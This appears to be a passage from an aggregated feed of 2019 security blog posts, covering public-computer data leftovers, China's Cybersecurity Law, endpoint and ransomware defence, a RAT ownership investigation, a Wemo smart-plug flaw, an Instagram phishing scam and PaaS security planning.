The desktop, document, and occasionally downloads folders are where most documents are inadvertently left behind. Some interesting samples I’ve discovered include a spreadsheet of faculty merit raises at a university in Texas, including the names of professors, their departments, their current salaries, and their projected raises. Another was the assignment of a chief officer to a ship belonging to one of the largest shipping companies in the world. It included the officer’s name, address, phone number, vessel name, date of assignment, and contact information.

I have come across corporate audits and strategic business plans. Recently, I discovered a document called “closing arguments” created by a district attorney. When possible, I contact the owners of the information to help them understand the risks of using public computers for sensitive work. I rarely hear back, however the DA did thank and assure me the document was a training example.

The biggest menace, however, has been the temporary files folders, which include auto-saved documents and spreadsheets, as well as attachments. It is in the Temporary Internet Files folder that I have uncovered complete emails, and even a webpage including a bank statement detailing a large balance, the account holder’s name, sources of income, and the names and addresses of places he had done business. Of all of the temporary files I have discovered, documents belonging to businesses’ employees have been the most unsettling. 

If you must, take precautions

There is some good news concerning the safety of public computers. Due to technology changes, I no longer find the contents of emails in the Temporary Internet Files folder. But we’re far from out of the woods. I have found my inbox cached, including pictures within emails and even a PDF that had not yet opened.

Although I could not open emails in the temoprary copy of my inbox shown above, subject lines and return email addresses may reveal more information than desired. 

Deleting temporary internet files is a good habit, but there are multiple locations that temporary files are stored. Documents edited on public computers remain of particular concern. Due to auto-save features, it’s possible to open a document on a thumb drive and leave auto-saved documents behind on the computer. Now in normal operating circumstances and with current operating systems and Office applications, this is not likely to happen. But errors like OS and application crashes will leave these copies behind. Microsoft Word and Excel will even proactively offer these auto-saved documents to the next user of these applications

The PDF file shown above was left behind when I read an email using my ISP’s webmail interface. 

Other than finding and deleting information left behind, my use of public computers is limited to reading online articles, checking the weather, and performing internet searches. What personal information you are willing to leave behind on a public computer depends on your risk tolerance. But it’s important to note that accessing corporate data on public computers could result in an inadvertent violation of company policies involving confidential data.

Although I still find public computers running Windows XP, there is a growing shift in the hospitality industry to use Kiosk applications. These provide limited functionality combined with locked-down security configurations. Access to the start menu is not possible and functionality is limited to desktop applications. Printing of boarding passes is a common allowed application. Reading web email is sometimes allowed, though I don’t recommend it because it requires entering a password. The risk of password compromise may be low, but the value of practicing quality security habits leads me to advise against it. If you must, consider changing your email password the next time you log onto a private computer.

If you happen to be using a public computer without a Kiosk interface, would you be so kind as to copy this blog, paste it into a Word document, and save it on the public computer to help inform the next user? They may end up paying it forward.

The post Notice: What Happens on Public Computers, Stays on Public Computers appeared first on Webroot Blog.

The Giant Awakens – China’s Cybersecurity Law (CSL) and Data Protection Obligations

While many of us were focused on the European Union’s GDPR and California’s Consumer Privacy Act (CCPA), the giant on the other side of the world implemented China’s Cybersecurity Law (CSL) in June 2017. While CSL laid out broad data protection principles, there were noticeable gaps related to implementation and overall scope. To operationalize and further clarify CSL scope, the Chinese government instituted six systems: the Internet Information Content Management System; the Cybersecurity Multi-Level Protection System (MLPS); the Critical Information Infrastructure Security Protection System; the Network Products and Services Management System; the Cybersecurity Incident Management System; and the Personal Information … Continue reading The Giant Awakens – China’s Cybersecurity Law (CSL) and Data Protection Obligations

The post The Giant Awakens – China’s Cybersecurity Law (CSL) and Data Protection Obligations appeared first on TrustArc Blog.

Effective Endpoint Security Strategy 101

Every organization wants to expedite processes, reduce costs, and bolster their staff. And in today’s modern digital world, these objectives are largely attainable, but can occasionally come with some unwarranted side effects. With all the devices an organization uses to achieve its business’ goals, things can occasionally get lost in the shuffle, and cybersecurity issues can emerge as a result. Balancing your business’ objectives while ensuring your organization’s data is secure can be a challenge for many. But that challenge can be assuaged by addressing cyberthreats at the start – the endpoint. Adopting an effective endpoint protection strategy is crucial for a modern-day organization and defines a strong security posture. In fact, the importance of endpoint security has even caught the eye of venture capitalist firms, who are investing billions a year in the cybersecurity sector. But what exactly are the components of a successful endpoint security strategy? Let’s break it down.

Ensure the Basics Are in Place

If there’s one thing my previous experience with consumer security has taught me, it’s that the proliferation of connected devices is showing no signs of slowing. The same goes for the connected devices leveraged by businesses day in and day out. Organizations often give multiple devices to their workers that will be used to communicate and contain crucial business-specific information. These devices are used by employees that go just about anywhere and do just about everything, so it’s important businesses equip their people with the tools they need to protect these devices and the data they safehouse.

The first important tool – VPNs, or Virtual Private Networks. The modern workforce is a mobile one, and professionals everywhere are carrying their devices with them as they travel and connect to public Wi-Fi networks. Public Wi-Fi networks are not typically the most secure, and VPNs can help ensure those mobile devices connect securely to avoid potentially exposing data.

These devices should always have strong authentication as well, which acts as the first line of defense for any security issues that arise. Remind everyone that their devices should be locked with a strong and complex password that acts as the gatekeeper for their device. That way, the company will be protected if that individual endpoint device becomes lost or stolen.

Empower Your Employees to Do Their Part

One of the most important tools to equip your employees with is proper security training. In order to keep endpoint devices safe and networks secure, employees should undergo regular security training sessions. This training should keep everyone up-to-date on the latest threats, the necessary precautions they need to take when browsing the web, and how their individual devices can impact an organization’s network.

One main point to hit upon during employee security training – the importance of updates. Updating your device software can feel like a menial task, but the gravitas behind the ask cannot be understated. Outdated software was the cause of the WannaCry global cyberattack and will be a differentiator moving forward for when attacks do come after individual endpoint devices.

Make Predictive Technology an Essential

Now, in order to anticipate major cyberattacks like WannaCry, adopting predictive technology for your endpoint security strategy is of the utmost importance, as these innovations can be used to guide your incident response strategy. Take it from hundreds of IT professionals, who in a recent SANS survey expressed that predictive technologies – such as machine learning (ML) and artificial intelligence (AI) – are required in order to go from already knowing bad elements to focusing on identification of abnormal behavior.

ML and AI technology are also particularly crucial for visibility. This technology can empower security teams to gain insight into their endpoint detection and response systems, which automatically reduces the time required to address threats. Therefore, businesses need to have this predictive technology in place to anticipate and quickly gain insight into all threats affecting their organization’s network.

Adopt Innovative Technology

For those unsure where to start when it comes to AI and ML, there’s good news – there are actually endpoint security solutions out there that have predictive technology included in their build. Solutions such as McAfee MVISION Mobile and McAfee MVISION Endpoint have machine learning algorithms and analysis built into their architecture to help identify malicious behavior and attack patterns affecting endpoint devices.

Innovative solutions such as these will act as the cherry on top of your endpoint security strategy. So, it is crucial to take the time to invest in the right technology, irrespective of the nature of your enterprise. By creating the right combination of process and product, your organization’s network will be secure, and you won’t have to pick between business growth and a healthy security posture.

To learn more about effective endpoint security strategy, be sure to follow us @McAfee and @McAfee_Business, and read more in our latest paper: Five Ways to Rethink Your Endpoint Protection Strategy.

The post Effective Endpoint Security Strategy 101 appeared first on McAfee Blogs.

UK-based organisations are getting better at preventing ransomware

The UK is one of the few countries that has seen a year-on-year reduction in ransomware attacks, a new study has found.

According to the 2019 SonicWall Cyber Threat Report, ransomware infections in the UK decreased by 59% in the past year, a stark contrast to the 11% increase globally.

Has the UK learned a lesson?

Several experts believe the UK’s astounding resilience to ransomware is a direct result of 2017’s WannaCry attack. The ransomware tore through organisations across the globe but struck most acutely in the UK – at the NHS in particular.

The attack did little to demonstrate the financial appeal of ransomware for crooks. The incident became so high profile that most organisations learned that it wasn’t worth paying the ransom, and those behind the attack struggled to recoup the money that was paid into their Bitcoin account.

Likewise, the attack didn’t provide an accurate reflection of how incidents normally play out. The malware is usually most successful when it stays under the radar and catches out organisations that lack backup protocols, thereby seemingly forcing them to comply with the blackmailer’s request.

However, WannaCry taught the UK two huge lessons – that ransomware is dangerous and that organisations need to plan for it.

Bill Conner, president and CEO of SonicWall, said that, following WannaCry, “you guys [the UK] were all over [ransomware].”

The attack prompted the UK government, along with the National Cyber Security Centre and UK-based businesses, to confront ransomware head on.

“Most of the vendors in the UK and their customers put solutions in place to protect against multiple family variants of ransomware,” said Conner.

Ransomware solutions

There are two key steps to protecting your organisation from ransomware. First, you should regularly back up your important files. This enables you to delete infected files and restore them from backups.

The process will take a long time – often more than 24 hours – but the loss in productivity will almost certainly be less costly than paying a ransom. Plus, you need to factor in issues other than simply the cost of returning to business. There’s the possibility that crooks won’t keep their word once you’ve paid up. Equally, there’s the risk that complying with their demands has made yourself a target for future attacks.

It’s therefore always advisable to use backups where possible rather than paying a ransomware.

Of course, it’s even better if you don’t get infected at all, and the best way to do that is to boost staff awareness of ransomware. That brings us to the second key step to protecting your organisation.

Most ransomware (and malware generally) is delivered via phishing scams. Cyber criminals plant the malicious code in an attachment and trick employees into downloading it. If you can train your staff to spot a malicious email and report it, you can dramatically reduce the risk of becoming infected.

Get started with staff awareness

Our Phishing and Ransomware – Human patch e-learning course makes staff awareness training simple.

This ten-minute course introduces employees to the threat of phishing and ransomware, and describes the link between the two. Armed with this knowledge, your staff will be able to detect suspicious emails and know how to respond.

The post UK-based organisations are getting better at preventing ransomware appeared first on IT Governance Blog.

TrustArc Recognized as 2019 Bay Area Best Places to Work

TrustArc, the leading data privacy management company, has been recognized as a winner of the 2019 Bay Area Best Places To Work, an awards program presented by the San Francisco Business Times and the Silicon Valley Business Journal!   Select employers from the Bay Area were named winners of the awards program, held on April 18, 2019. These winning organizations were honored for having created exceptional workplaces that their employees value highly. Award applicants were evaluated and ranked across five categories according to the number of Bay Area employees. The ranking found companies in the region whose employees rate them as … Continue reading TrustArc Recognized as 2019 Bay Area Best Places to Work

The post TrustArc Recognized as 2019 Bay Area Best Places to Work appeared first on TrustArc Blog.

Veracode Is Named a Leader for Sixth Time in Gartner Magic Quadrant for Application Security Testing

Veracode has been named a Leader in the Gartner Inc. 2019 Magic Quadrant for Application Security Testing, marking our sixth year as a Leader.

We’re excited to again be recognized as a Leader in the industry. We believe Gartner continues to place Veracode in this position because of our vision in application security testing and our ability to cover the entire software development lifecycle (SDLC), from code to deployment, with services and support that help development teams with challenges, and a new analytics engine that shows performance in real-time.

It has been an incredible start to the year – customers are scanning more applications than ever before with Veracode, and are achieving unprecedented results with their AppSec programs. We’re dedicated to helping companies achieve a frictionless SDLC in which security and development teams work in collaboration without slowing down business outcomes.

The AppSec market is growing at a rapid pace, and far more quickly than other security sectors.

The report’s authors, Ayal Tirosh, Mark Horvath, and Dionisio Zumerle, state in the report: "Through 2022, the AST market is projected to have a 10% compound annual growth rate (CAGR). This continues to be a fast-growing segment in the information security space, which itself is expected to grow at at five-year CAGR of 9%. The AST market size is estimated to reach $1.15 billion by the end of 2019."1

It’s not difficult to understand why – 111 billion lines of new code are written each year, a figure that will only go up because software powers the world around us. And that software is constantly being updated, and must be kept secure to prevent vulnerabilities from being exploited by both sophisticated and simplistic attacks. A new layer of complexity arises when you take into account compliance with privacy laws such as GDPR and PCI that seek to ensure companies have policies and practices in place to protect data.

Companies across industries are changing how they create and use software, seeking a competitive edge by taking modern approaches such as DevSecOps, Agile, microservices, cloud native apps, and APIs. However, these changes mean that organizations face even greater challenges to secure software that is being created rapidly and in new environments.

Veracode has redoubled its efforts to bring innovative products to customers to help them not only meet the challenges they encounter, but also to make secure software one of the reasons they are emboldened to change the world. Our solutions are designed for developers to excel at their jobs while coding securely.

We recently enhanced our platform with accelerated dynamic application security testing (DAST) using a new scalable architectural approach that allows for seamless deployment. With Veracode DAST, customers can easily configure to scan internal applications in the cloud, within containers, on a virtual machine or bare metal; customize scans for organizational compliance; and scan multiple applications using a single endpoint.

In addition, our focus on developer needs remains a core value at Veracode:

  • Veracode’s Software Composition Analysis (SCA) offering currently covers more than 1.9 million different and unique open source libraries, and almost 17.3 million different versions of those libraries.
  • Veracode Greenlight finds security defects in your code in seconds so you can fix findings directly in the IDE.
  • We support more than 100 languages and frameworks, including support for Go, Scala, and Python.

The thinking around software security is changing – is your company changing with it?

To download the 2019 Gartner Magic Quadrant for Application Security Testing, please visit here.

1. Gartner, Inc.  “Magic Quadrant for Application Security Testing” by Ayal Tirosh, Mark Horvath, and Dionisio Zumerle, April 18, 2019.

Gartner does not endorse any vendor, product or service depicted in its research publications, and does not advise technology users to select only those vendors with the highest ratings or other designation. Gartner research publications consist of the opinions of Gartner's research organization and should not be construed as statements of fact. Gartner disclaims all warranties, expressed or implied, with respect to this research, including any warranties of merchantability or fitness for a particular purpose.

Here’s a Codicil to Add to Your Will – Disposal of Your Digital Assets

Codicil to Add to your Will – Disposal of Your Digital Assets

We were still in shock over the sudden demise of a dear family friend. But the bereaved family had no time for grieving. The gentleman had not left any will and no one had any clear idea about his financial and physical assets. The family was running from pillar to post, trying to sort out the mess.

Tomorrow, you and I will go meet our lawyer and find out how to draw up our will. I want us to leave everything in order, with specific instructions, so that there are no complications for the kids later,” announced my spouse one fine morning.

I readily agreed; however, I had a question.

OK, but what about our digital assets?”

The spouse looked confused and so I continued, “Shouldn’t we also make arrangements for how we want our digital assets to be handled post our decease?”

Most of us in the age group of 40-60 years are active in the digital world in a big way, with multiple online accounts- from social media, banking, travel booking, trading, e-mail, e-transaction to blogs, e-wallets and home service. We share personal photos and videos online. We also deal with virtual currency, the records of which are stored online. The sum of all this digital data is loosely termed as our digital asset.

You may wonder what’s the big deal about a will for digital assets as some may not even have any monetary value. Well, it will help in identifying your legal successor who can take decisions about your online accounts. Otherwise, your beneficiaries will have to run around searching for passwords, filling up forms, submitting requests at various places and so on. Secondly, your families need to know about any outstanding bills you may have received via email or credit card program, or financial payments due to you.
A will outlining usernames and passwords for all accounts and detailing what you want to be done with your digital asset will make it easier for your beneficiaries to take the right actions. Also, it will allow your family to continue receiving the payments from your online investments, or even payment from your blog site!

Prepare ahead

You can take any of these three steps:

a- Explain to your family about all your online accounts and passwords

b- Write down all details in a diary and keep it where it can be easily found

c- Create a will outlining your wishes and specifications regarding your digital assets

The first two options call for sharing passwords beforehand, something that you may not be comfortable with. So, the  third option is the best available. Go for it and your dear ones will bless you for your foresight.

Be proactive about your online presence

  • There may be content on your accounts you would not want others to see- We may create or download content that we would like to keep private. The best thing to do is to regularly sanitize accounts and delete what you don’t want others to see.
  • Inactive accounts and profiles are much in demand– cyber criminals want access to inactive accounts to create false IDs and fake profiles. They can also create problems for friends and families of the users.

While most of our generation limits themselves to a handful of social media accounts, below are a few handy guidelines to securing key social media accounts –

Facebook

The social media giant allows you to appoint a legal heir who can either opt to memorialize the account or delete it permanently. They will not offer login information to the family though.

Instagram

Just like Facebook, Instagram too offers the option of either getting an account deleted or memorialized, after they receive a valid request. They also pledge to take measures to protect the privacy of the deceased person by securing the account.

YouTube

YouTube does not yet offer any facility for preserving or deleting content created by users. In fact, it regularly deletes inactive or dead accounts, which is quite understandable, given the huge volumes of uploads per minute.

Twitter

It allows legal successors to place request for deactivation of the account. They will guide you through the process, which is similar to that of Facebook and Instagram.

LinkedIn

The legal successors/family members need to approach them with certain information and fill out a form shared on their site. They will then close the account and remove the profile.

Google

Sign into Google -> My Account -> Personal Info & Privacy -> Inactive Account Manager -> setup. Then add up to 10 trusted people who will be notified if you have been inactive for a specified period. You can leave them a last message and they can also download the data that you have chosen to share with them – like emails, passwords saved by Google, photos in Drive etc.

Or else, you can ask Google to delete your entire account after a certain amount of inactivity.

Microsoft including Outlook

Similarly, legal successors can inform Microsoft to close down the account and download any information you may have chosen to share with them.

In conclusion

So, you see if you leave everything written and registered in your will, your dear ones will have less to bother about. Also, it’s our duty as well, for this is the digital world and we are the digital natives. It is about time we start doing things right in cyberspace too so as to not leave behind a legacy of clutter, confusion and possible cybercrime.

Always keep your devices secured with advanced security tools like McAfee Total Protection so that cyber criminals don’t get to your data before your heirs do.

The post Here’s a Codicil to Add to Your Will – Disposal of Your Digital Assets appeared first on McAfee Blogs.

How Business can address the Security Concerns of Online Shoppers

It’s no secret that cybersecurity is an epidemic problem that affects online businesses on a global scale. E-commerce businesses are especially affected by data breaches because it weakens the consumer’s trust in online businesses to protect their personal data. In response to the growing number of breaches, governments and enterprises alike are stepping up to the plate to provide sustainable solutions to the problem.

The UK is aiming to become a world leader in cybersecurity by investing a substantial amount of money (to the tune of £70 million) in the Industrial Strategy Challenge Fund. The fund represents the government’s commitment to increase funding in research and development by £4.7 billion over a four year period. One of the primary goals of the investment will be to supply the industry with the money necessary to design and develop state-of-the-art hardware that’s more secure and resilient to common cyber threats.

The logic stems from the fact that cybercriminals are constantly finding new ways to exploit current technology, so the best way to combat future attacks is to design chips and hardware with stronger security features built into them to outpace cyber threats. However, this means businesses will have to invest in new IT systems as it rolls out to keep their security measures up to par.

For the time being, online business owners need to do everything in their power to address the privacy concerns of their users. In some cases, this might mean investing in more secure and modern e-commerce platforms that offer security features, such as TLS (still commonly known as SSL) protection and security software to protect against malware attacks, or simply generating new, strong admin passwords on a regular basis.

The fact is, there is no way to provide customers with a 100% guarantee their personal data is safe, but there are actions webmasters and companies can do to make their websites a lot safer to use by their customers. To help you learn more about how you can secure your site from cyber threats, Wikibuy has laid out 15 steps in the infographic below.


How Business Owners Can Address Online Shopping Concerns

Who’s Behind the RevCode WebMonitor RAT?

The owner of a Swedish company behind a popular remote administration tool (RAT) implicated in thousands of malware attacks shares the same name as a Swedish man who pleaded guilty in 2015 to co-creating the Blackshades RAT, a similar product that was used to infect more than half a million computers with malware, KrebsOnSecurity has learned.

An advertisement for RevCode WebMonitor.

At issue is a program called “WebMonitor,” which was designed to allow users to remotely control a computer (or multiple machines) via a Web browser. The makers of WebMonitor, a company in Sweden called “RevCode,” say their product is legal and legitimate software “that helps firms and personal users handle the security of owned devices.”

But critics say WebMonitor is far more likely to be deployed on “pwned” devices, or those that are surreptitiously hacked. The software is broadly classified as malware by most antivirus companies, likely thanks to an advertised feature list that includes dumping the remote computer’s temporary memory; retrieving passwords from dozens of email programs; snarfing the target’s Wi-Fi credentials; and viewing the target’s Webcam.

In a writeup on WebMonitor published in April 2018, researchers from security firm Palo Alto Networks noted that the product has been primarily advertised on underground hacking forums, and that its developers promoted several qualities of the software likely to appeal to cybercriminals looking to secretly compromise PCs.

For example, RevCode’s website touted the software’s compatibility with all “crypters,” software that can encrypt, obfuscate and manipulate malware to make it harder to detect by antivirus programs. Palo Alto also noted WebMonitor includes the option to suppress any notification boxes that may pop up when the RAT is being installed on a computer.

A screenshot of the WebMonitor builder panel.

RevCode maintains it is a legitimate company officially registered in Sweden that obeys all applicable Swedish laws. A few hours of searching online turned up an interesting record at Ratsit AB, a credit information service based in Sweden. That record indicates RevCode is owned by 28-year-old Swedish resident Alex Yücel.

In February 2015, a then 24-year-old Alex Yücel pleaded guilty in a U.S. court to computer hacking and to creating, marketing and selling Blackshades, a RAT that was used to compromise and spy on hundreds of thousands of computers. Arrested in Moldova in 2013 as part of a large-scale, international takedown against Blackshades and hundreds of customers, Yücel became the first person ever to be extradited from Moldova to the United States.

Yücel was sentenced to 57 months in prison, but according to a record for Yücel at the U.S. Federal Bureau of Prisons, he was released on Nov. 1, 2016. The first advertisements in hacker forums for the sale of WebMonitor began in mid-2017. RevCode was registered as an official Swedish company in 2018, according to Ratsit.

Until recently, RevCode published on its Web site a value added tax (VAT) number, an identifier used in many European countries for value added tax purposes. That VAT number — first noted by the blog Krabsonsecurity.com (which borrows heavily from this site’s design and banner but otherwise bears no relation to KrebsOnSecurity.com) — has since been removed from the RevCode Web site and from historic records at The Internet Archive. The VAT number cited in that report is registered to Alex Yücel, and matches the number listed for RevCode by Ratsit AB.

Yücel could not be immediately reached for comment. But an unnamed person responded to an email sent to the customer support address listed at RevCode’s site. Presented with the information and links referenced above, the person responding wrote, “nobody working for/with RevCode is in any way related to BlackShades. Anything else suggesting otherwise is nothing but rumors and attempts to degrade our company by means of defamation.”

The person responding from the RevCode support email address contended that the Alex Yücel listed as owner of the company was not the same Alex Yücel convicted of co-authoring Blackshades. However, unless the Ratsit record is completely wrong, this seems unlikely to be true.

According to the Ratsit listing, the Alex Yücel who heads RevCode currently lives in a suburb of Stockholm, Sweden with his parents Can and Rita Yücel. Both Can and Rita Yücel co-signed a letter (PDF) in June 2015 testifying to a New York federal court regarding their son’s upstanding moral character prior to Yücel the younger’s sentencing for the Blackshades conviction, according to court records.

A letter from Alex Yücel’s parents to the court in June 2016.

McAfee ATR Team Discovers New IoT Vulnerability in Wemo Insight Smart Plugs

*This blog is originally from August 2018 and was updated April 2019*

From connected baby monitors to smart speakers — IoT devices are becoming commonplace in modern homes. Their convenience and ease of use make them seem like the perfect gadgets for the whole family. However, users can be prone to putting basic security hygiene on the backburner when they get a shiny new IoT toy, such as applying security updates, using complex passwords for home networks and devices, and isolating critical devices or networks from IoT. Additionally, IoT devices’ poor security standards make them conveniently flawed for someone else: cybercriminals, as hackers are constantly tracking flaws which they can weaponize. When a new IoT device is put on the market, these criminals have a new opportunity to expose the device’s weaknesses and access user networks. As a matter of fact, our McAfee Labs Advanced Threat Research team uncovered a flaw in one of these IoT devices: the Wemo Insight Smart Plug, which is a Wi-Fi–connected electric outlet.

Once our research team figured out how exactly the device was vulnerable, they leveraged the flaw to test out a few types of cyberattacks. The team soon discovered an attacker could leverage this vulnerability to turn off or overload the switch, which could overheat circuits or turn a home’s power off. What’s more – this smart plug, like many vulnerable IoT devices, creates a gateway for potential hackers to compromise an entire home Wi-Fi network. In fact, using the Wemo as a sort of “middleman,” our team leveraged this open hole in the network to power a smart TV on and off, which was just one of the many things that could’ve been possibly done.

And as of April 2019, the potential of a threat born from this vulnerability seems as possible as ever. Our ATR team even has reason to believe that cybercriminals already have or are currently working on incorporating the unpatched Wemo Insight vulnerability into IoT malware. IoT malware is enticing for cybercriminals, as these devices are often lacking in their security features. With companies competing to get their versions of the latest IoT device on the market, important cybersecurity features tend to fall by the wayside. This leaves cybercriminals with plenty of opportunities to expose device flaws right off the bat, creating more sophisticated cyberattacks that evolve with the latest IoT trends.

Now, our researchers have reported this vulnerability to Belkin, and, almost a year after initial disclosure, are awaiting a follow-up. However, regardless if you’re a Wemo user or not, it’s still important you take proactive security steps to safeguard all your IoT devices. Start by following these tips:

  • Keep security top of mind when buying an IoT device. When you’re thinking of making your next IoT purchase, make sure to do your research first. Start by looking up the device in question’s security standards. A simple Google search on the product, as well as the manufacturer, will often do the trick.
  • Change default passwords and do an update right away. If you purchase a connected device, be sure to first and foremost change the default password. Default manufacturer passwords are rather easy for criminals to crack. Also, your device’s software will need to be updated at some point. In a lot of cases, devices will have updates waiting from them as soon as they’re taken out of the box. The first time you power up your device, you should check to see if there are any updates or patches from the manufacturer.
  • Keep your firmware up-to-date. Manufacturers often release software updates to protect against these potential vulnerabilities. Set your device to auto-update, if you can, so you always have the latest software. Otherwise, just remember to consistently update your firmware whenever an update is available.
  • Secure your home’s internet at the source. These smart home devices must connect to a home Wi-Fi network in order to run. If they’re vulnerable, they could expose your network as a result. Since it can be challenging to lock down all the IoT devices in a home, utilize a solution like McAfee Secure Home Platform to provide protection at the router-level.

And, of course, to stay on top of the latest consumer and mobile security threats, be sure to follow me and @McAfee_Home on Twitter, listen to our podcast Hackable? and ‘Like’ us on Facebook.

The post McAfee ATR Team Discovers New IoT Vulnerability in Wemo Insight Smart Plugs appeared first on McAfee Blogs.

The “Nasty List” Phishing Scam Is out to Steal Your Instagram Login

How often do you check your social media accounts? According to a recent study, internet users spend an average of 2 hours and 22 minutes per day on social networking platforms. Since users are pretty reliant on social media, cybercriminals use it as an avenue to target victims with various cyberattacks. The latest social media scheme called “The Nasty List” scams users into giving up their Instagram credentials and uses their accounts to further promote the phishing scam.

So, how exactly do hackers trick innocent users into handing over their login information? Cybercriminals spread this scam by sending messages through hacked accounts to the user’s followers, stating that they were spotted on a “Nasty List.” These messages will read something like “OMG your actually on here, @TheNastyList_34, your number is 15! its really messed up.” If the recipient visits the profile listed in the message, they will see a link in the profile description. An example of one URL that has been listed in these scam profiles is nastylist-instatop50[.]me. The user is tricked into believing that this link will supposedly allow them to see why they are on this list. This link brings up what appears to be a legitimate Instagram login page. When the victim enters their credentials on the fake login page, the cybercriminals behind this scheme will be able to take over the account and use it to further promote the scam.

Images courtesy of Bleeping Computer.
Images courtesy of Bleeping Computer.

Fortunately, there are a number of steps Instagram users can take to ensure that they don’t fall victim to this trap. Check out the following tips:

  • Be skeptical of messages from unknown users. If you receive a message from someone you don’t know, it’s best to ignore the message altogether or block the user. Additionally, if you think a friend’s social media account has been compromised, look out for spelling mistakes and grammatical errors in their message, which are common in these scams.
  • Exercise caution when inspecting links sent to your messages. Always inspect a URL before you click on it. In the case of this scam, the URL that appears with the fake login page is clearly incorrect, as it ends in a [.]me.
  • Reset your password. If your account was hacked by ‘The Nasty List’ but you still have access to your account, reset your password to regain control of your account.

And, as usual, to stay updated on all of the latest consumer and mobile security threats, follow @McAfee_Home  on Twitter, listen to our podcast Hackable?, and ‘Like’ us on Facebook.

The post The “Nasty List” Phishing Scam Is out to Steal Your Instagram Login appeared first on McAfee Blogs.

Our PaaS App Sprung a Leak

Many breaches start with an “own goal,” an easily preventable misconfiguration or oversight that scores a goal for the opponents rather than for your team. In platform-as-a-service (PaaS) applications, the risk profile of the application can lure organizations into a false sense of security. While overall risk to the organization can be lowered, and new capabilities otherwise unavailable can be unlocked, developing a PaaS application requires careful consideration to avoid leaking your data and making the task of your opponent easier.

PaaS integrated applications are nearly always multistep service architectures, leaving behind the simplicity of yesterday’s three-tier presentation/business/data logic applications and basic model-view-controller architectures. While many of these functional patterns are carried forward into modern applications—like separating presentation functions from the modeled representation of a data object—the PaaS application is nearly always a combination of linear and non-linear chains of data, transformation, and handoffs.

As a simple example, consider a user request to generate a snapshot of some kind of data, like a website. They make the request through a simple portal. The request would start a serverless application, which applies basic logic, completes information validation, and builds the request. The work goes into a queue—another PaaS component. A serverless application figures out the full list of work that needs to be completed and puts those actions in a list. Each of these gets picked up and completed to build the data package, which is finally captured by another serverless application to an output file, with another handoff to the publishing location(s), like a storage bucket.

Planning data interactions and the exposure at each step in the passing process is critical to the application’s integrity. The complexity of PaaS is that the team must consider threats both for each script/step at a basic level individually as well as holistically for the data stores in the application. What if I could find an exploit in one of the steps to arbitrarily start dumping data? What if I found a way to simply output more data unexpectedly than it was designed to do? What if I found a way to inject data instead, corrupting and harming rather than stealing?

The familiar threats of web applications are present, and yet our defensive posture is shaped by which elements of the applications we can see and which we cannot. Traditional edge and infrastructure indicators are replaced by a focus on how we constructed the application and how to use cloud service provider (CSP) logging together with our instrumentation to gain a more holistic picture.

In development of the overall application, the process architecture is as important as the integrity of individual technical components. The team leadership of the application development should consider insider, CSP, and external threats, and consider questions like:

  • Who can modify the configuration?
  • How is it audited? Logged? Who monitors?
  • How do you discover rogue elements?
  • How are we separating development and production?
  • Do we have a strategy to manage exposure for updates through blue/green deployment?
  • Have we considered the larger CSP environment configuration to eliminate public management endpoints?
  • Should I use third-party tools to protect access to the cloud development and production environment’s management plane, such as a cloud access broker, together with cloud environmental tools to enumerate accounts and scan for common errors?

In the PaaS application construction, the integrity of basic code quality is magnified. The APIs and/or the initiation processes of serverless steps are the gateway to the data and other functions in the code. Development operations (DevOps) security should use available sources and tools to help protect the environment as new code is developed and deployed. These are a few ways to get your DevOps team started:

  • Use the OWASP REST Security Cheat Sheet for APIs and code making calls to other services directly.
  • Consider deploying tools from your CSP, such as the AWS Well-Architected Tool on a regular basis.
  • Use wrappers and tie-ins to the CSP’s PaaS application, such as AWS Lambda Layers to identify critical operational steps and use them to implement key security checks.
  • Use integrated automated fuzzing/static test tools to discover common missteps in code configuration early and address them as part of code updates.
  • Consider accountability expectations for your development team. How are team members encouraged to remain owners of code quality? What checks are necessary to reduce your risk before considering a user story or a specific implementation complete?

The data retained, managed, and created by PaaS applications has a critical value—without it, few PaaS applications would exist. Development teams need to work with larger security functions to consider the privacy requirements and security implications and to make decisions on things like data classification and potential threats. These threats can be managed, but the specific countermeasures often require a coordinated implementation between the code to access data stores, the data store configuration itself, and the dedicated development of separate data integrity functions, as well as a disaster recovery strategy.

Based on the identified risks, your team may want to consider:

  • Using data management steps to reduce the threat of data leakage (such as limiting the amount of data or records which can be returned in a given application request).
  • Looking at counters, code instrumentation, and account-based controls to detect and limit abuse.
  • Associating requests to specific accounts/application users in your logging mechanisms to create a trail for troubleshooting and investigation.
  • Recording data access logging to a hardened data store, and if the sensitivity/risk of the data store requires, transition logs to an isolated account or repository.
  • Asking your development team what the business impact of corrupting the value of your analysis, or the integrity of the data set itself might be, for example, by an otherwise authorized user injecting trash?

PaaS applications offer compelling value, economies of scale, new capabilities, and access to advanced processing otherwise out of reach for many organizations in traditional infrastructure. These services require careful planning, coordination of security operations and development teams, and a commitment to architecture in both technical development and managing risk through organizational process. Failing to consider and invest in these areas while rushing headlong into new PaaS tools might lead your team to discover that your app has sprung a leak!

The post Our PaaS App Sprung a Leak appeared first on McAfee Blogs.

From Internet to Internet of Things

Thirty years ago, Tim Berners-Lee set out to accomplish an ambitious idea – the World Wide Web. While most of us take this invention for granted, we have the internet to thank for the technological advances that make up today’s smart home. From smart plugs to voice assistants – these connected devices have changed the modern consumer digital lifestyle dramatically. In 2019, the Internet of Things dominates the technological realm we have grown accustomed to – which makes us wonder, where do we go from here? Below, we take a closer look at where IoT began and where it is headed.

A Connected Evolution

Our connected world started to blossom with our first form of digital communication in the late 1800s –– Morse code. From there, technological advancements like the telephone, radio, and satellites made the world a smaller place. By the time the 1970s came about, email became possible through the creation of the internet. Soon enough the internet spread like wildfire, and in the 1990s we got the invention of the World Wide Web, which revolutionized the way people lived around the world. Little did Berners-Lee know that his invention would be used decades, probably even centuries, later to enable the devices that contribute to our connected lives.

Just ten years ago, there were less than one billion IoT devices in use around the world. In the year 2019, that number has been projected to skyrocket to over eight billion throughout the course of this year. In fact, it is predicted that by 2025, there will be almost twenty-two billion IoT devices in use throughout the world. Locks, doorbells, thermostats and other everyday items are becoming “smart,” while security for these devices is lacking quite significantly. With these devices creating more access points throughout our smart homes, it is comparable to leaving a backdoor unlocked for intruders. Without proper security in place, these devices, and by extension our smart homes, are vulnerable to cyberattacks.

Moving Forward with Security Top of Mind

